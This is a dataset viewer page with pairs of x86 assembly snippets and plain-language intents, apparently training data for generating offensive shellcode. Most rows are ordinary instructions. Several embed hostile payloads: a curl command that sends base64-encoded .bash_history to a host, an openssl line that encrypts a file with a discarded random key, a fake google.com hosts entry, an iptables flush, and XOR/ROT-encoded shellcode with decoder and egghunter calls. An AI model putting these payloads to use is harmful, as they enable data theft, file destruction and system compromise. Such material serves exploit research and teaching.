SNIPPETS
stringlengths 2
1.64k
| INTENTS
stringlengths 4
1.66k
|
|---|---|
add esi, 0x8
|
add 0x8 to esi
|
add esi, 0x8
|
make esi point to next 8bytes of "shellcode"
|
add esi, 2
|
add 2 to the contents of esi
|
add esi, 4
|
add 4 to the contents of the esi register
|
add esi, 4
|
add 4 to esi
|
add esi, eax
|
set the mem addr dinamically
|
add esi, eax
|
add the contents of the eax register to the contents of esi register
|
add esi, eax
|
add eax to esi
|
add esi,4
|
scan the next section of mem
|
add esp, 0x20
|
add 0x20 to the contents in esp and save the result in esp
|
add esp, 3
|
add 3 to the contents of esp
|
add esp, 3
|
add 3 to the contents of the esp register
|
add esp, 4
|
add 4 to the esp register
|
add marks, 10
|
add 10 to the variable marks
|
addr: db 0x1
|
define addr = db 0x1
|
addr: db 0x1
|
define the byte addr and initialize it to 0x1
|
all:
|
define _all label
|
all:
|
define the all label
|
an_integer dd 12425
|
define the doubleword an_integer and initialize it to 12425
|
and al, 0fh
|
perform a logical and operation between the al register and the 0fh value and store the result in the al register
|
and ax, 1
|
perform logical and between ax and 1
|
and eax, 0000000fh
|
mask out lowest 4 bits of the eax register
|
and eax, 0fh
|
clear all but the last 4 bits of eax
|
and eax, 3f465456
|
perform and operation between eax and 3f465456 and save the result in eax
|
and eax, 40392b29
|
perform and operation between eax and 40392b29 and save the result in eax
|
and ebx, 0000000fh
|
mask out lowest 4 bits of the ebx register
|
and ecx, 0000000fh
|
mask out lowest 4 bits of the ecx register
|
and ecx,dword ptr [eax-0x7]
|
anding the double word at the adress eax-0x7 and ecx register
|
and ecx,dword ptr [ebx+0x1a]
|
anding the double word at the adress ebx+0x1a and ecx register
|
and edx, 0000000fh
|
mask out lowest 4 bits of the edx register
|
and mask1, 128
|
perform and operation on the variable mask1 and 128
|
arr dd 100
|
define the doubleword arr and initialize it to 100
|
arr dd 50
|
define the doubleword arr and initialize it to 50
|
arr1 resb 400
|
reserve the array arr1 of 400 uninitialized bytes
|
array dd 20
|
define the doubleword arr and initialize it to 20
|
array word 20
|
define an array of 20 initialized word
|
array word 5
|
define an array of 5 initialized word
|
aslr_file:
|
define _aslr_file label
|
b: dd 0x0
|
create variable b in memory and initialize to zero
|
big_number dd 123456789
|
define the doubleword variable big_number and initialize it to 123456789
|
bignum: resw 1
|
reserve 1 word at location bignum
|
bound ebp,qword ptr [ecx+0x6e]
|
perform a bound check to array index
|
bound ebp,qword ptr [edx-0x55915597]
|
perform a bound check to array index
|
bound esp,qword ptr [ebx+0x41]
|
perform a bound check to array index
|
buffer: resb 64
|
reserve 64 bytes for buffer
|
buffersize: dw 1024
|
declare buffersize to be a word containing 1024
|
byte_table db 14, 15, 22, 45
|
define a tables of bytes byte_table and initialize to 14, 15 and 22
|
byte_value db 150
|
define the byte value byte_value and initialize it to 150
|
bytes db 10
|
define the byte value bytes and initialize it to 10
|
bytes db 20
|
define the byte value bytes and initialize it to 20
|
call _appendfile
|
call the _appendfile function
|
call _appendfile \n msg2 db "passwd", 0x00
|
jump to _appendfile label after putting the address of the next istruction on the top pf the stack
|
call _build
|
call the _build function
|
call _build \n msg db "curl http://localhost:8080 -d 'data='$(cat .bash_history | base64 -w 0) -x post", 0x0a
|
push the address of msg on the top of the stack, and then change the eip to the address in _build label
|
call _continue
|
call _continue
|
call _continue
|
call the _continue function
|
call _exec
|
jump to _exec label
|
call _exec
|
call the _exec function
|
call _exec \n msg db "mv test.txt .test.txt && head -c 32 /dev/urandom | base64 | openssl aes-256-cbc -e -in .test.txt -out test.txt -pbkdf2 -k - && rm .test.txt", 0x0a
|
push the address of message on the top of the stack, and then change the eip to the address in _exec label
|
call _exit
|
call _exit
|
call _malloc
|
call _malloc
|
call _myfunc
|
call the _myfunc function
|
call _params
|
call the _params function
|
call _params \n string db "test.txt"
|
push the address of test.txt on the top of the stack, and then change the eip to the address in _params label
|
call _printf
|
call the _printf function
|
call _write
|
call the _write function
|
call _write \n google: db "127.1.1.1 google.com"
|
go to _write label after entering google address on the top of the sack
|
call [esp]
|
push the current code location on stack and the perform an unconditional jumo to the code location indicated by esp content
|
call [esp]
|
execute decoded_shellcode
|
call [esp]
|
call the function in esp
|
call atoi
|
call the atoi function
|
call code
|
call the code function
|
call code \n file: db "/sbin/iptables#-f"
|
push the address of file: db "/sbin/iptables#-f" on the top of the stack, and then change the eip to the address in code_label
|
call cont
|
call the cont function
|
call cont \n db '0',10
|
go to _cont after entering db '0',10 adress on the top of the stack
|
call decoder
|
jump to _decoder label
|
call decoder
|
go to _decoder label
|
call decoder
|
go to deocder label
|
call decoder
|
jump to decoder_label
|
call decoder
|
call the function decoder
|
call decoder
|
call the decoder function
|
call decoder
|
call decoder
|
call decoder \n encoded_shellcode: dw 0x545, 0x4a3, 0x583, 0x5d3, 0x541, 0x541, 0x439, 0x5d3, 0x5d3, 0x541, 0x5e7, 0x5d5, 0x5cf, 0x411, 0x4eb, 0x443, 0x509, 0x48d, 0x423, 0x539
|
jump to _decoder label after saving encoded_shellcode ' dw 0x545, 0x4a3, 0x583, 0x5d3, 0x541, 0x541, 0x439, 0x5d3, 0x5d3, 0x541, 0x5e7, 0x5d5, 0x5cf, 0x411, 0x4eb, 0x443, 0x509, 0x48d, 0x423, 0x539' pointer to esi
|
call decoder \n encoded: dw 0x04, 0x539, 0x9d9, 0x6c9, 0xfc9, 0xc49, 0xc29, 0x839, 0xdf9, 0xc49, 0xc49, 0x839, 0x839, 0xce9, 0xc59, 0x259, 0x4f9, 0xfc9, 0x259, 0x4e9, 0xff9, 0x259, 0x4d9, 0x1c9, 0xa79, 0x619, 0x2c9, 0x539
|
jump to decoder_label after entering the double word string encoded '0x04, 0x539, 0x9d9, 0x6c9, 0xfc9, 0xc49, 0xc29, 0x839, 0xdf9, 0xc49, 0xc49, 0x839, 0x839, 0xce9, 0xc59, 0x259, 0x4f9, 0xfc9, 0x259, 0x4e9, 0xff9, 0x259, 0x4d9, 0x1c9, 0xa79, 0x619, 0x2c9, 0x539' on stack
|
call decoder \n encodedshellcode: db 0x32,0x51,0x30,0x74,0x69,0x63,0x6f,0xe4,0x8a,0x54,0xe2,0x0c,0x81,0xc1,0x69,0x30,0x69,0x30,0x6a,0x8a,0x51,0xe3,0x8a,0xb1,0xce
|
push the address of encodedshellcode on the top of the stack, and then change the eip to the address in _shellcode label
|
call decoder \n encodedshellcode: db 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94, 0x9f,0x9f,0xd8,0xa5,0x9e,0x99,0x7e,0x24,0xb7,0x7e,0x25,0xb4,0x7e,0x26,0x57,0xfc,0x3a,0x87
|
jump to _decoder label after entering _encodedshellcode (db db 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94,0x9f,0x9f,0xd8,0xa5,0x9e,0x99,0x7e,0x24,0xb7,0x7e,0x25,0xb4,0x7e,0x26,0x57,0xfc,0x3a,0x87) on the top of the stack
|
call decoder \n shellcode: db 0x18,0x38,0xc7,0x57,0x6f,0x36,0x36,0x7a,0x6f,0x6f,0x36,0x69,0x70,0x75,0x90,0xea,0x38,0xd0,0x90,0xd1,0x71,0x12,0x5f,0xd4,0x87
|
go to _decoder label after entering the address of the array shellcode (0x18,0x38,0xc7,0x57,0x6f,0x36,0x36,0x7a,0x6f,0x6f,0x36,0x69,0x70,0x75,0x90,0xea,0x38,0xd0,0x90,0xd1,0x71,0x12,0x5f,0xd4,0x87) on the top of the stack
|
call decoder \n shellcode: db 0x3e,0xcd,0x5d,0x75,0x3c,0x3c,0x80,0x75,0x75,0x3c,0x6f,0x76,0x7b,0x96,0xf0,0x5d,0x96,0xef,0x60,0x96,0xee,0xbd,0x18,0xda,0x8d
|
go to _decoder label after entering shellcode (db 0x3e,0xcd,0x5d,0x75,0x3c,0x3c,0x80,0x75,0x75,0x3c,0x6f,0x76,0x7b,0x96,0xf0,0x5d,0x96,0xef,0x60,0x96,0xee,0xbd,0x18,0xda,0x8d) address on the top of the stack
|
call decoder \n shellcode: db 0x4b,0xf7,0x13,0x59,0xcc,0x8c,0x63,0x5e,0x9f,0x8d,0x99,0x9f,0x1f,0xa4,0x3b,0x6e,0xc6,0x36,0x23 \n shellcodelen equ $-shellcode
|
shellcode address will be pushed into the stack
|
call decoder \n shellcode: db 0x62,0x60,0xa0,0x34,0x5e,0x97,0xe6,0x34,0xd0,0x97,0xc4,0xb4,0xdc,0xc4,0xc7,0x28,0x13,0x71,0xa6,0xc4,0xc3,0x58,0x16,0xe6,0x01
|
go to _decoder label after entering shellcode Ô0x62,0x60,0xa0,0x34,0x5e,0x97,0xe6,0x34,0xd0,0x97,0xc4,0xb4,0xdc,0xc4,0xc7,0x28,0x13,0x71,0xa6,0xc4,0xc3,0x58,0x16,0xe6,0x01Õ on the top of the stack
|
call decoder \n xor dword ptr [edx-0x55af5540],ebp
|
xoring ebp content with the double word at the adress edx-0x55af5540 then go to decoder label
|
call decoder_setup
|
call decoder_setup
|
call decoder1 \n xor_value: db 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa \n rot_value: db 13, 13, 13, 13, 13, 13, 13, 13 \n shellcode: db 0x94,0x67,0xf7,0xdf,0x96,0x96,0x2a,0xdf,0xdf,0x96,0xc5,0xdc,0xd1,0x3c,0x5a,0xf7,0x3c,0x45,0xca,0x3c,0x44,0x17,0xb2,0x70,0x27
|
jump to decoder1_label afetr entering xor_value, rot_value and shellcode on the top pf the stack
|
call doit
|
call the doit function
|
call egghunter
|
go to egghunter
|
call egghunter
|
call the egghunter function
|
call esi
|
call esi
|
call esi
|
call the function in esi
|
call esp
|
call esp
|
call execute
|
call the execute function
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.